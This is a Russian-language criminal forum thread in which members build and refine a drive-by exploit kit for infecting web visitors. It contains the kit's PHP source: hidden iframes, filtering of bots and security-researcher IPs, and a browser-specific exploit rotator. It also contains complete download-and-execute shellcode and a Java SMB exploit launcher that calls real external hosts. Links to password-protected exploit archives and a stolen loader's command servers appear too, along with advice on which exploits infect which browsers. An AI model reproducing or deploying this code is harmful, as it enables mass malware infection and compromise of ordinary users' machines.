Подскажите по связке.

Chococream

Старожил форума
Легенда
Регистрация
31.10.2009
Сообщения
347
Реакции
42
Вообщем связка не ахти, основана на коде TrueUser`a, но переделана по сравнению с нынешним...
Создавалась с целью изучения, а также во время моего начала работы со связками))
Принимаются доработки и критика в сторону, также буду благодарен любым советам.

Что-то взял из Сибири, что-то из феникса.
Фичи: крипт внутреннего файла с отдачей в load.php(там всё просто)+счётчик по типу fopen/flock/fputs/fclose.
После сжатия любым пхп обфускатором размер со сплоитами: 7-8кб.
Сорсы отражают лишь общую суть, если надо по просьбе могу выложить остальные части исходника.

Собственно говоря многие спросят с какой целью выложил ?
1)Продолжить идею TrueUser`а о написании микросвязок.
2)Написать общими силами единую связку, дальше каждый в меру своих возможностей разберётся сам.
3)Изучить js.

По мере решения тех или иных вопросов я буду выкладывать в эту тему готовый сурс. Не стисняйтесь - добавляйте своё или критикуйте.

Собственно сорсы:
Код:
<?php

/********************************
* Coded by Chococream. 23.08.2010 *
*********************************/

/*********************************
* Пробив связки оценивается про- *
* грузками файла(партнёрка).     *
**********************************/

//Путь к связке
$pack_url = 'http://'.$_SERVER['HTTP_HOST'].'/ex.php';

//Путь до лоадера
$url = 'http://'.$_SERVER['HTTP_HOST'].'/load.php';

//Путь к HCP сплойту
$hcp_url = 'http://'.$_SERVER['HTTP_HOST'].'/s.hta';

//Стата
if($_GET['go']=='stata'){die(file_get_contents('count'));} //count src: 25/14(ppl come/ppl loaded).

//Проверяем гет запрос
if($_GET['go'] != 1) {

//Автоифреймер
echo '<iframe src="'.$pack_url.'?go=1" width=0 height=0 frameborder=0></iframe>';
} else {

   /**
    * ************************ Работа связки ********************
    */

$ip = $_SERVER['REMOTE_ADDR'];

//Определяем браузер
function br() {
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if((eregi("Google", $user_agent))
or(eregi("Aport", $user_agent)) 
or(eregi("BOTW", $user_agent)) 
or(eregi("boitho.com", $user_agent)) 
or(eregi("Entireweb", $user_agent)) 
or(eregi("Baidu", $user_agent)) 
or(eregi("crawler", $user_agent)) 
or(eregi("Transcoder", $user_agent)) 
or(eregi("VisualParser", $user_agent)) 
or(eregi("Aport", $user_agent)) 
or(eregi("Yahoo", $user_agent)) 
or(eregi("msnbot", $user_agent)) 
or(eregi("Turtle", $user_agent)) 
or(eregi("Yandex", $user_agent)) 
or(eregi("YaDirectBot", $user_agent)) 
or(eregi("Rambler", $user_agent)) 
or(eregi("James Bond", $user_agent)) 
or(eregi("Ask Jeeves", $user_agent))  
or(eregi("EltaIndexer", $user_agent)) 
or(eregi("GameSpyHTTP", $user_agent)) 
or(eregi("grub-client", $user_agent)) 
or(eregi("Slurp", $user_agent)) 
or(eregi("Pagebull", $user_agent)) 
or(eregi("Scooter", $user_agent)) 
or(eregi("Nutch", $user_agent)) 
or(eregi("Zeus", $user_agent)) 
or(eregi("WebAlta", $user_agent)) 
or(eregi("Wget", $user_agent)) 
or(eregi("bot", $user_agent)) 
or(eregi("ia_archiver", $user_agent)))  
{$res = "Bots";}
elseif(ereg("iPhone", $user_agent)) $res = "iPhone";
elseif((ereg("Nintendo", $user_agent)) or(ereg("Nitro", $user_agent))) $res = "Nintendo browser";
elseif(eregi("PlayStation", $user_agent)) $res = "PlayStation";
elseif(ereg("PPC;", $user_agent)) $res = "Pocket PC";
elseif((ereg("PPC", $user_agent)) or(eregi("Mac_PowerPC", $user_agent))) $res = "Power PC";
elseif((eregi("Symbian", $user_agent)) 
or(eregi("BlackBerry", $user_agent)) 
or(eregi("Motorola", $user_agent)) 
or(eregi("Smartphone", $user_agent)) 
or(eregi("Windows CE", $user_agent)) 
or(eregi("Nokia", $user_agent)) 
or(eregi("mobile", $user_agent))){$res = "Mobile phone browser";}
elseif(eregi("Opera Mini", $user_agent)) {$res = "Opera Mini/mobile phone";}
elseif(eregi("(opera) ([0-9]{1,2}.[0-9]{1,3}){0,1}", $user_agent, $bv) or eregi("(opera)/([0-9]{1,2}.[0-9]{1,3}){0,1}", $user_agent, $bv)) {$res = "Opera ".$bv[2]."";}
elseif(eregi("(konqueror)/([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv)) {$res = "Konqueror ".$bv[2]."";}
elseif(eregi("(lynx)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $user_agent, $bv)) {$res = "Lynx ".$bv[2]."";}
elseif(eregi("(links) \\(([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv)) {$res = "Links ".$bv[2]."";}
elseif(eregi("(netscape)/(6.[0-9]{1,3})", $user_agent, $bv)) {$res = "Netscape ".$bv[2]."";}
elseif(eregi("(firefox)/([0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2})", $user_agent, $bv) or
eregi("(firefox)/([0-9]{1,2}.[0-9]{1,2})", $user_agent, $bv)) {$res = "FireFox ".$bv[2]."";}
elseif(eregi("(amaya)/([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv)) {$res = "Amaya ".$bv[2]."";}
elseif(eregi("(Chrome)/([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv)) {$res = "Chrome ".$bv[2]."";}
elseif(eregi("(Safari)", $user_agent)) {$res ="Safari";}
elseif(eregi("(msie) ([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv)) {$res = "MSIE ".$bv[2]."";}
elseif(eregi("(SeaMonkey)/([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv)) {$res = "SeaMonkey ".$bv[2]."";}
elseif(eregi("(mozilla)/([0-9]{1,2}.[0-9]{1,3})", $user_agent, $bv))
{$res = "Mozilla ".$bv[2]."";}
elseif(eregi("(flock)", $user_agent))
{$res ="Flock";}
elseif(eregi("(maxthon)", $user_agent)) {$res ="Maxthon";}
else {$res = "Unknown";}
return $res;
}
$browser=br();

//Antibot
if($browser == 'Bots') {
 die();
}

//Antiwepaewet бредовая функа :) надо дорабатывать однозначно...
$badips = array('128.111.48.152', '143.215.130.61', '139.146.167.25', '97.74.141.1', '213.171.194.34', '213.31.172.77');
for($i=0; $i<=6; $i++) {
 if($ip == $badips[$i]) {
  die();
 }
}

//AntiSophos тоже самое в ситуации с вепаветом...
$ip = explode('.', $ip2);
if($ip2[0].'.'.$ip2[1].'.'.$ip2[2] == '92.123.155') {
 die();
}

   /**
    * ************************ ФУНКЦИИ ********************
    */

   //Подключаем криптор
   include('crypt.php');
global $var;

//Unescape
function unescape($s) {
$out = "";
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if($g != (strlen($res)/4)) $res.="00";
for($i=0; $i<strlen($res);$i+=4)
$out.="%u".substr($res,$i+2,2).substr($res,$i,2);
return $out;
}

//Encode from %u to hex
function dec2hex_from_u($t) {
for($i=0;$i<strlen($t)/6;$i++) {
$str = $t;
$c = $i*6;
$str = strstr($str, ord("%u"));
$str = $str[$c+0].$str[$c+1].$str[$c+4].$str[$c+5].$str[$c+2].$str[$c+3];
$str = str_replace($str[0].$str[1], '', $str);
$r .= "%u$str";
}
$r = str_replace('%u', '', $r);
return $r;
}

//Gen shellcode
function shcode($url) {
$shcode = "Можете взять любой паблик шк";
return $shcode.$url."%u9000";
}

//HEX encoder
function uEncode($s) {
$res=strtoupper(bin2hex($s));
$g = round(strlen($res)/4);
if($g != (strlen($res)/4)) { $res.="00"; }
$out = "";
for($i=0; $i<strlen($res); $i+=4) {
$out.="%u".substr($res, $i+2, 2).substr($res, $i, 2);
}
return $out;
}

   //Сплойты.

   /************************ COM ********************/
$com = "";

   /************************ IEPEERS ********************/
$iep = "";

   /************************ MDAC ********************/
$mdac = "";

   /************************ SNAPSHOT ********************/
$snapshot = "";

   /************************ HCP ********************/
$hcp = '';

   /************************ JAVA ********************/
$java = "";

   /************************ PDF ********************/
if(eregi("Opera", $browser) || eregi("firefox", $browser) || eregi("mozilla", $browser)) {
$pdf = "<object width='0' height='0' frameborder='0' type='application/pdf' data='pdf.php'><param name='src' value='1.pdf'>";
} else {
$pdf = "<iframe width='0' height='0' frameborder='0' src='pdf.php'></iframe>";
}

if(eregi("IE", $browser)) {
$pdf = '
function pdf(){
 try {
 var obj = null;
 obj = new ActiveXObject("AcroPDF.PDF");
 if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
 if (obj) {document.getElementById("pdfplace").innerHTML = "'.$pdf.'";}
 } catch(e) { %next% }
}';

} else {
$pdf = "
function pdf() {
 for (var i = 0; i < navigator.plugins.length; i++){
 var name = navigator.plugins[i].name;
 if (name.indexOf(\"Adobe Acrobat\") != -1){
  document.getElementById(\"pdfplace\").innerHTML = \"".$pdf."\";
 } else { %next% }
 }
}";

}

   /************************ FF ********************/
$ff = "";

   /************************ GET EXP ********************/
function get_exp($spl) {
global $mdac, $com, $pdf, $snapshot, $iep, $java, $ff, $hcp;
list($exp1, $exp2, $exp3, $exp4, $exp5, $exp6, $exp7, $exp8, $exp9, $exp10)=explode(", ",$spl);
$c = preg_match_all('/, /',$spl,$found)+1;
for($i=0;$i<=$c;$i++) {
eval("\$spl_code = \$\$exp".$i.";");
$i++;
eval("\$spl_next = \$exp".$i.";");
$i--;
$get = '();';
if($c <= $i) { $get = ''; }
$spl_repl .= str_replace('%next%', $spl_next.$get, $spl_code);

eval("\$r .= \$\$exp".$i.";");
}

return $comment.crypter($spl_repl.$exp1."();")."</script>
//$comment - у меня здесь отдельная процедура, которая генерит трэш, типа шаблона странички. Также здесь юзается crypter() функция, которая при вызове криптует ваш js код.
</body>
</html>";
}

       /**
        * ************************ РОТАТОР ********************
        */

//Проверка на уникальность
if(isset($_COOKIE['micro_pack'])) {
 die();
}

//Заголовки
@ob_start('ob_gzhandler');
error_reporting(0);
ignore_user_abort(1);

//Ставим куки
$cookie_time = 99999;
SetCookie('micro_pack', md5(rand(0, 999)), time() + $cookie_time);

//Записываем чела
$count=file_get_contents('count');
$count=explode('/',$count);
$count[0]++;
$countf=fopen('count','r+');
flock($countf,2);
fputs($countf,$count[0].'/'.$count[1]);
fclose($countf);

//Открываем документ
echo '<html><head>
<script>
window.onerror =  return(true);
</script>
<style>
div {display:none;}
b {display:none;}
</style>
</head><body>';

       //Подключаем ротатор сплойтов

//IE 8
if(eregi('MSIE 8', $browser)) {
echo get_exp('pdf');
echo $java;
echo $hcp;
echo get_exp('snapshot');
}

//IE 7
elseif(eregi('MSIE 7', $browser)) {
echo get_exp('pdf');
echo $java;
echo $hcp;
echo get_exp('iep');
}

//IE 6
elseif(eregi('MSIE 6', $browser)) {
echo get_exp('pdf');
echo $java;
echo get_exp('mdac');
echo get_exp('iep');
}
 
//IE 5
elseif(eregi('MSIE 5', $browser)) {
echo get_exp('mdac, pdf, com');
echo $java;
}
 
//IE 4
elseif(eregi('MSIE 4', $browser)) {
echo get_exp('mdac, pdf, com');
echo $java;
}
 
//FF
elseif(eregi('firefox', $browser)) {
echo get_exp('pdf');
echo get_exp('ff');
echo $java; //!!!
}
 
//Opera
elseif(eregi('Opera', $browser) or eregi('opera', $browser)) {
echo get_exp('pdf');
echo $java;
}

else {echo get_exp('pdf'); echo $java; }

//Закрываем документ
echo '</body></html>';
@ob_end_flush();
exit;
}
?>
 
//Записываем чела
$count=file_get_contents('count');
$count=explode('/',$count);
$count[0]++;
$countf=fopen('count','r+');
flock($countf,2);
fputs($countf,$count[0].'/'.$count[1]);
fclose($countf);
тут вопщем надо лочить файло при открытии его на ридрайт - имхо косяк, ни вообще нах оно писать не надо ничего.

//Подключаем ротатор сплойтов

//IE 8
if(eregi('MSIE 8', $browser)) {
....

ну это разве ротатор :) эт порнография какая то. надо обязательно проверять ЯВАСКРИПТОМ конечно же плагины, ну а в проверка браузера выполненная в ДВА этапа на регэкспах - это жестко.

наконец в шелл не надо дописывать урл таким явным способом :)
и вообще все надо делать полностью на яваскрипте конечно же.
 
тут вопщем надо лочить файло при открытии его на ридрайт - имхо косяк, ни вообще нах оно писать не надо ничего.
Ты внимательно приглядись - flock стоит :) Я этот вариант тестировал много раз, даже через флуд пропускал скрипт, следил за реакцией))
У меня было два варианта: либо в шеллкод писать стукача(только если его расковыряют здесь уже антифлуд не поможет), второе придумывать что-то с файлами, учитывая, что направленность проекта - именно микросвязки, а мне важна точность(т.е публик счётчики и прочие сервисы не в счёт).

ну это разве ротатор  эт порнография какая то. надо обязательно проверять ЯВАСКРИПТОМ конечно же плагины, ну а в проверка браузера выполненная в ДВА этапа на регэкспах - это жестко.

наконец в шелл не надо дописывать урл таким явным способом
и вообще все надо делать полностью на яваскрипте конечно же.
Вот этот пункт как раз можно отнести к моему третьему удтверждению.

Заодно хотел бы спросить совета тех, кто изучал js:
С чего начать, мб ссылок накидаете ?(гугл взял в оборот).

Теперь по поводу шеллкода:
Слышал на форуме шёл разговор о неком подобии(легко сказано) инжекта в процесс в шк. Кто, что на этот счёт думает ?
По мере развития сего проекта - буду выкладывать свои наработки.
 
Нашёл в сети очень много шк, начиная от slesh шк, заканчивая какой-то самоделкой с xor.

Вот кстати какой-то мини-лоадер, который я стыбзил со связки NeoSploit:
http://www.sendspace.com/file/10t9gi

Пароль:
xss.pro/

Это качает:
http://69.50.197.244/data/upd12.dat
http://69.50.197.244/user/up/xl3.dat
Ужс... каждый файл минимум 250кб((

Сюда стучит и затем полученный текст ксорит байтом EF.
http://69.50.197.244/user/xl3.php

Также вот hcp сплоитег:
http://www.sendspace.com/file/qfnt80

Пароль:
xss.pro/

Ну дак кто, что посоветует по моему вопросу ?
 
дело в том, что некоторые популярные сплоиты типа java и еще некоторые , они непосредственно скриптово делают DownloadFile -> Exec без шеллкода , то есть теперь нужно все взвесить...какой процент от общего пробива сплоитов с шеллкодом и без него
 
Согласен - вот сейчас что-то более-менее надёжное в плане связки соберу, потом потестируем. Java неоспоримо даёт неплохой пробив ко всему. Плюс ещё пдфки криптовать надо.

Кстати нашёл тут антирапорт, хз если кому надо - пм.

Вопросы выше актуальны.
 
Dragon Pack shellcode
У этой связки шк слизан с Eleonore(док-во: http://datafrog.biz/topic/14).

Код:
START:
        XOR EAX,EAX
        MOV EAX,DWORD PTR FS:[EAX+030h]
        MOV EAX,DWORD PTR DS:[EAX+0Ch]
        MOV EAX,DWORD PTR DS:[EAX+014h]
        MOV EAX,DWORD PTR DS:[EAX]
        MOV EAX,DWORD PTR DS:[EAX]
        MOV EBX,DWORD PTR DS:[EAX+10h]

        PUSH 44h
        POP EDX
        SHL EDX,1
        SUB ESP,EDX
        MOV EBP,ESP
        JMP @main

;============*****==================
@procedure:
        POP EDX
        PUSH EDX
        SUB EDX,056h
        MOV DWORD PTR SS:[EBP+4],EDX
        PUSH ESI
        PUSH EDI
        MOV ESI,DWORD PTR DS:[EBX+03Ch]
        MOV ESI,DWORD PTR DS:[EBX+ESI+078h]
        ADD ESI,EBX
        PUSH ESI
        MOV ESI,DWORD PTR DS:[ESI+020h]
        ADD ESI,EBX
        XOR ECX,ECX
        DEC ECX

@main2:
        PUSH EAX
        INC ECX
        LODS DWORD PTR DS:[ESI]
        XOR EDI,EDI

@loop:
        MOVSX EDX,BYTE PTR SS:[EBX+EAX]
        CMP DL,DH
        JE @next
        ROR EDI,0Dh
        ADD EDI,EDX
        INC EAX
        JMP @loop

@next:
        POP EAX
        CMP EDI,EAX
        JNZ @main2
        POP ESI
        MOV EAX,DWORD PTR DS:[ESI+024h]
        ADD EAX,EBX
        MOV CX,WORD PTR DS:[EAX+ECX*2]
        MOV EDX,DWORD PTR DS:[ESI+01Ch]
        ADD EDX,EBX
        MOV EAX,DWORD PTR DS:[EDX+ECX*4]
        ADD EAX,EBX
        POP EDI
        POP ESI
        PUSH EAX
        RETN
;============*****==================
@main:
        LEA EDI,DWORD PTR SS:[EBP+8]
        PUSH EDI
        PUSH EDX
        MOV EAX,05B8ACA33h
        CALL @procedure  ; GetTempPathA
        XOR AL,AL
        MOV ESI,EDI
        REPNE SCAS BYTE PTR ES:[EDI]
        DEC EDI
        MOV EAX,078652E65h
        STOS DWORD PTR ES:[EDI]
        CBW
        STOS WORD PTR ES:[EDI]
        MOV AL,06Ch
        MOV AH,AL
        CWDE
        PUSH EAX
        PUSH 0642E6E6Fh
        PUSH 06D6C7275h
        PUSH ESP
        MOV EAX,0EC0E4E8Eh
        CALL DWORD PTR SS:[EBP+4]  ; LoadLibraryA(urlmon.dll)
        XCHG EAX,EBX
        PUSH EAX
        XOR EAX,EAX
        PUSH EAX
        PUSH EAX
        PUSH ESI
        MOV EDX,DWORD PTR SS:[EBP+4]
        ADD EDX,07Fh
        ADD EDX,031h
        PUSH EDX
        PUSH EAX
        MOV EAX,0702F1A36h
        CALL DWORD PTR SS:[EBP+4]  ; URLDownloadToFileA
        POP EBX
        XOR EDI,EDI
        PUSH EDI
        PUSH ESI
        MOV EAX,0E8AFE98h
        CALL DWORD PTR SS:[EBP+4]  ; WinExec
        PUSH EDI
        MOV EAX,060E0CEEFh
        CALL DWORD PTR SS:[EBP+4]; ExitThread
db "http://someshit.ru/load.php", 0
END START
 
Подскажите по ротатору, какие сплоиты добавить, также хотелось бы услышать конструктивную критику:
Код:
var sv=plugindetect();//Детект пдф плагина
if (sv<920)
   {
     ifr('{PDF_NAME}');//Выдача пдф
  setTimeout(1000);
   }
if (window.navigator.javaEnabled()){
  document.write("{APPLET}");//Выдача java сплойта
  setTimeout(2000);
}
 var asx = "{ASX_NAME}";
 if (browserName="Microsoft Internet Explorer") {
 if fullVersion.substr(0,1)<=6) {
{MDAC}//Ну собственно MDAC
}else{
 var o = document.createElement("OBJECT");
            o.setAttribute("classid", "clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6");
            o.openPlayer(asx);//Выдача HCP експа для IE
}

}else{
ifr(asx);//Выдача HCP експа для остальных браузеров

}
 
моя идея состояла в том, чтобы подтягивать через шеллкод спец дллку которая себя уже дальше скопирует куда надо из памяти браузеров , конечно можно поробовать , например java и pdf сплойты буду скачивать и выполнять екзе (кстати было бы хорошо проверить смогут ли они скачать дллку и сделать loadlibrary), а другие через шеллкоды - но опять стоит ли игра свеч , если современные лодыри пробивают от 70-85% - с такой конструкцией может на 5-10% будет увеличение, но в плане геморности и практичности и геморности хз
 
Подскажите по ротатору, какие сплоиты добавить, также хотелось бы услышать конструктивную критику:
По коду не знаю, но на счёт выдачи можешь глянуть у моей связки - проверено не только на словах, но и на практике.

Вот из феникса взял:
Код:
document.write("<body><div id='j'></div><OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT></body>");

function PDF(){
try{
var lv=Pdf1.GetVersions();
var fi=/EScript=([^,]+),/;
var fif=/AcroForm=([^,]+),/;
lvf=lv.match(fif)[1].split('.');
lv=lv.match(fi)[1].split('.');
sv=parseInt(lv[0]);
lv=parseInt(lv.join(''));
lvf=parseInt(lvf.join(''));

if (lv==710){
SHOWPDF('0.pdf');

}else if (((sv==6)||(sv==7))&&(lv<711)){
SHOWPDF('1.pdf');

}else if ((lv>=800)&&(lv<931)){
SHOWPDF('2.pdf');

}else if((lvf>=931)&&(lvf<=934)){
SHOWPDF('3.pdf');

}else{
setTimeout('квиктайм();', 4000);
}

}catch (e){
setTimeout('квиктайм();', 4000);
}
}

моя идея состояла в том, чтобы подтягивать через шеллкод спец дллку которая себя уже дальше скопирует куда надо из памяти браузеров
Здесь опять же первый факт - никто не смотрит на выдачу, выполнился ли шеллкод, не забили ли юзеру память выделенным хипом.

конечно можно поробовать , например java и pdf сплойты буду скачивать и выполнять екзе (кстати было бы хорошо проверить смогут ли они скачать дллку и сделать loadlibrary), а другие через шеллкоды
Вот как раз я выше показал на основе NeoSploit`a как лоадер выполнен, но там екзе.

(кстати было бы хорошо проверить смогут ли они скачать дллку и сделать loadlibrary), а другие через шеллкоды - но опять стоит ли игра свеч , если современные лодыри пробивают от 70-85% - с такой конструкцией может на 5-10% будет увеличение, но в плане геморности и практичности и геморности хз
Тут 2 способа:
1)скачка и запуск дллки.
2)запуск дллки в памяти шеллкода(но там гемор с пе лоадером, вариант отбрасываем, да и дллку палим в шк).
Как по поводу увеличения отстука у связки хз - так 4-8% прибавит.
Вообще было бы конечно интересно на это посмотреть, если надо - я готов набросать несколько шк для теста подгруза длл, авось чего и выйдет.
 
Со своей стороны готов предоставить:
1)Связку(сейчас в процессе доработки ротатора на js).
2)На выбор несколько шеллкодов(в зависимости от задачи).

karabas-barabas
Говори конкретно какое ТЗ под шк - будем делать.
 
Кагбе тоже занимаюсь данным вопросом......Собственно также доделую ротатор на js....пока сплоиты HCP, java, mdac, pdf...Хотелось бы услышать о актуальных експах в данный момент?!
2 Chococream ковырял я феникс и не только, видел как там все реализовано..
 
GOONER
PDF Collab, GetIcon, PrintF, NewPlayer, LibTiff(багов там пока хоть отбавляй).
HCP - основа IE7,8.
Java DES, GSB - бьёт по всему.
Java SMB - тоже бьёт неплохо.
mdac - основа IE5,6.
IEPEERS - 2% ко всему, зато помогает в IE6,7.
FLASH(9,10), SWF - говорят гуд вещи, в фениксе мальком видал(бьёт если у юзера есть Shockwave Flash, т.е здесь тоже должна стоять проверка).
ФФ баги - знают два экспа, но бьют на старых версиях, к общему 2-4%.
Snapshot - пробивает IE8.

Вообщем было бы неплохо сделать ротатор пока с первостепенной проверкой(плагины, броузер), заодно параллельно js подучу ))
 
Код:
$count=file_get_contents('count');

...

$countf=fopen('count','r+');
flock($countf,2);

Надо открывать файл на чтение\запись и лочить его. Этот вариант что у тебя не совсем то что надо.
 
Я также считаю что имело бы смысл провести раздельное тестирование имеет ли вообще смысл пользоваться шеллкодом или же юзать скриптстарты лоадера....

Надо продумать алгоритм хранения сплойтов (все в одном файле или же раскидать по разным файлам с другим расширением).
 
Надо открывать файл на чтение\запись и лочить его. Этот вариант что у тебя не совсем то что надо.
Какое у тебя решение на счёт этого кода ?

Надо открывать файл на чтение\запись
Эквивалентно второму параметру fopen - "r+" или "a+".

и лочить его
flock(); собственно говоря три варианта блокировки(второй параметр):
LOCK_SH to acquire a shared lock (reader).
LOCK_EX to acquire an exclusive lock (writer).
LOCK_UN to release a lock (shared or exclusive).

Привожу пример из сети:
Код:
<? 
$fp = fopen("file", "a");
flock($fp, LOCK_EX);
ftruncate($fp, 0);
fputs($fp, $data)
fflush($fp);
flock($fp, LOCK_UN);
fclose($fp);
?>
 
PDF Collab <= 7.1
GetIcon, PrintF, NewPlayer - не нужны есть же libtiff
LibTiff - все с ним отлично если правильно юзать
HCP - его вроде палит msrt, из-за него могут быстро в блек улетать домены
Java DES - больше пиздит чем бьет
Java GSB - тоже уже старенький
Java SMB - тут сказать нечего, я не юзаю
mdac - сплоит 2006 года, гугл ходит по 6 ишаком и собирает таким образом связки, ибо в любой связке есть mdac, хотя толку от него уже нету
IEPEERS - у меня так и не заработал ))):
FLASH(9,10), SWF - тоже старье, с автоапдейтем флеша толку от этих сплоитов не будет
ФФ баги - хз есть свежий фф баг, будет ли толк хз, опять же у фф автоапдейт
Snapshot - хоть у кого нить он сработал ? по моему он только стату рисует и ничего не запуская
 
Java SMB на счёт него я хз, взял из паблик топа:
http://exploit.in/forum/index.php?showtopic=37627

Читаемс:
JAVA SMB - новенький эксплойт, пробивает системы с уязвимыми JRE даже на WIN7 (ASLR+DEP enabled).

Смотримс:
Код вызывается из MDAC();
Код:
function JAVASMB(){
try {
var u = 'http: -J-jar -J\\\\wintersn.com\\smb\\teo.avi  http://193.178.172.59/kjb/ylh2.php?i=2 none';
if (window.navigator.appName == 'Microsoft Internet Explorer'){
try {
var o = document.createElement('OBJECT');
o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA';
o.launch(u);
}catch (e){
var o2 = document.createElement('OBJECT');
o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9-00805F499D93';
o2.launch(u);
}
}else{
var o = document.createElement('OBJECT');
var n = document.createElement('OBJECT');
o.type = 'application/npruntime-scriptable-plugin;deploymenttoolkit';
n.type = 'application/java-deployment-toolkit';
document.body.appendChild(o);
document.body.appendChild(n);
try {
o.launch(u);
}catch (e){
n.launch(u);
}
}
}catch (e){
SWF();
}
SWF();
}
Сам Java сплоит:
http://www.sendspace.com/file/n2aa43
Пароль: xss.pro/

TrueUser
Понял) Исправил в коде.
На вскидку получается так:
Код:
$filename = 'count';
$countf=fopen($filename,'r+');
flock($countf,2);
$count=fread($countf, filesize($filename));
$count=explode('/',$count);
$count[0]++;
fputs($countf,$count[0].'/'.$count[1]);
flock($countf,3);
fclose($countf);
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх